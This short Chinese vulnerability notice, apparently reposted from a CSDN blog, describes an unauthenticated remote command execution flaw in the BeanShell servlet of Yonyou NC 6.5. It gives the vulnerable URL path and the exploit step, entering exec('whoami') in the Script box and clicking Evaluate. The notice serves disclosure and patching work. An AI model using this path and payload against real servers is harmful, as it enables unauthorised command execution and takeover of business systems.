用友 NC bsh.servlet.BshServlet 遠程命令執行漏洞
0x01漏洞描述
用友 NC bsh.servlet.BshServlet 存在遠程命令執行漏洞,該漏洞為遠程命令執行漏洞,在無需登陸系統的情況下,攻擊者可通過BeanShell測試接口直接執行任意命令,惡意攻擊者成功利用該漏洞可獲得目標系統管理權限,系統如果直接暴露在互聯網上風險較大。
0x02漏洞影響
用友 NC6.5版本
漏洞地址
http://xxx.xxx.xxx.xxx/servlet/~ic/bsh.servlet.BshServlet
在Script框輸入要執行的命令,點擊Evaluate即可
exec("whoami")
原文鏈接:https://blog.csdn.net/weixin_44893633/article/details/117638915